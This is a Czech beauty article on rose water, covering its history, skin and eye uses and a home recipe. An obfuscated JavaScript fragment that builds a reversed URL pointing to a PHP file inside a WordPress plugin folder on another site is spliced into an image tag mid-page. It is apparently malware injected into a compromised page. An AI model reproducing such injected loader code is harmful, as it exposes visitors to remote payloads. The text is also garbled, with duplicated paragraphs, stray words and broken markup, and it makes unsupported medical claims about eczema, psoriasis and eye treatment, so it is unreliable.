FACESTARKrásaRůžová voda: Znáte opravdu její blahodárné účinky na vaší pleť?

Růžová voda: Znáte opravdu její blahodárné účinky na vaší pleť?

Legenda praví, že egyptská královna Kleopatra milovala svůj vzhled natolik, že se denně koupala v mléčné lázni s okvětními lístky růží. O její lůžko muselo být vždy poseto lístky růží. Věřila, že právě růže mají magickou moc a obsahují afrodiziakum, díky němuž svedla Marka Antonia.

Legenda praví, že egyptská královna Kleopatra milovala svůj vzhled natolik, že se denně koupala v mléčné lázni s okvětními lístky růží. O její lůžko muselo být vždy poseto lístky růží. Věřila, že právě růže mají magickou moc a obsahují afrodiziakum, díky němuž svedla Marka Antonia.

Od té doby byly růže používány v lécích, kosmetice i kulinářství po tisíce let v různých koutech světa. Nicméně, objev získávání růžové vody z růžových lístků sahá do 11. století a připisuje se Arabskému alchymistovi Avicennovi.

Dnes je růžová voda vodný roztok získaný parní destilací drcených okvětních lístků. Dobře známá pro své antiseptické a antibakteriální vlastnosti a je vynikající pro čištění, změkčení a tonizaci pokožky. Její vůně je příjemná, lehká a svěží. 

Růžová voda a péče o pleť

and

Růžová voda je jednou z nejdůležitějších pleťových vod používaných v kosmetice při přípravě peelingu a pleťových masek. Příjemně totiž osvěžuje, oživuje a vyrovnává pokožku. 

Chcete-li hloubkově vyčistit vaší pleť a dopřát ji dostatečnou výživu vlastní směsí, kterou si doma smícháte, budete potřebovat; 2 lžíce růžové vody, 2 lžíce medu, 2 lžíce cukru a 1 kapku oleje s vitamínem E. Jemně ji vmasírujte po celém obličeji a nechte 2-3 minuty působit, poté opláchněte. Nakonec navlhčete vatový tamponek růžovou vodou a ještě jednou obličej jemně otřete. Máte-li problémy s akné, vyčistěte si obličej růžovou vodou až 3krát denně.

Růžová voda minimalizuje póry a je prevencí proti vráskám. Může být také velmi užitečná pro zmírnění různých forem dermatitidy, lupénky a ekzému. 

Růžová voda a její účinky na unavené oči

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand-rose-petals-1.jpg“ alt=““ width=“585″ height=“390″ />

Růžová voda se může používat ke zklidnění unavených, červených a bolavých očí. Je také velmi užitečná při boji s tmavými kruhy pod očima.

Vezměte dva tampónky a nalijte na ně trochu růžové vody. Navlhčené tampónky položte na vaše oči a nechte půl hodiny působit. Každý večer také můžete vaše unavené oči opláchnout směsí z 30 ml růžové vody a 120 ml destilované vody. Tato směs pomůže zmírnit námahu a únavu očí. 

…..Nyní si můžete růžovou vodu vyrobit sami doma!

Vše co budete potřebovat je:

2 šálky destilované vody
1 šálek čerstvých růžových lístků (asi 8 až 10 růží)
100% čistý růžový olej 

Plátky růží vložte do hrnce a zalijte vodou. Zakryjte a vařte na mírném ohni po dobu 30 minut. Po dokončení, přidejte několik kapek růžového oleje a nechte vychladnout. Plátky vyjměte a zbylou růžovou vodu vlijte do spreje. Uchovávejte v chladném a tmavém místě. Nyní můžete růžovou vodu s její nádhernou vůní použít na tělo i obličej.

Související články